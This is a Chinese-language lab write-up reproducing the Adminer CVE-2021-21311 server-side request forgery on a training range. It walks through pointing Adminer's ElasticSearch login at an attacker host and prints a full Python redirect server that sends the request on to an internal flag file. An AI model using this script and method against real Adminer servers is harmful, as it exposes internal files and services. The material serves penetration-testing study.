CVE-2021-21311复现学习

adminer版本是4.7.8,是php编写的 [数据库管理工具]存在漏洞 CVE-2021-21311 ,它是 Adminer 版本 4.0.0 中的服务器端请求伪造,到 4.7.9。

此漏洞是 [SSRF] ,服务端请求伪造

adminer服务端ip为http://10.22.234.145/

Adminer登录页面,选择ElasticSearch作为系统目标,并在server字段填写example.com,点击登录即可看到example.com返回的400错误页面展示在页面中

image-20250807003647448

在10.132.1.39启动一个python服务器,该服务监听传入的连接

image-20250807003932498

漏洞利用成功,可以看到页面上就显示了flag.txt文件的内容。

image-20250807004016711

当然在这里官方也提供了一个更便捷的python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import http.server
import socketserver

class RedirectHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
# 设置重定向到指定URL
self.send_response(301) # 301: 永久重定向
self.send_header('Location', 'http://10.22.234.145:80/flag.txt') # 设置重定向地址
self.end_headers()

def run(server_class=http.server.HTTPServer, handler_class=RedirectHandler):
server_address = ('', 1111) # 监听1111端口
httpd = server_class(server_address, handler_class)
print('Server running on port 80...')
httpd.serve_forever()

if __name__ == '__main__':
run()

image-20250807004349461

漏洞利用成功,可以看到页面上就显示了flag.txt文件的内容。

该靶场由NextCyber提供,如果你也对渗透测试感兴趣,这个平台是个不错的选择。
地址:nextcyber

image-20250807004659984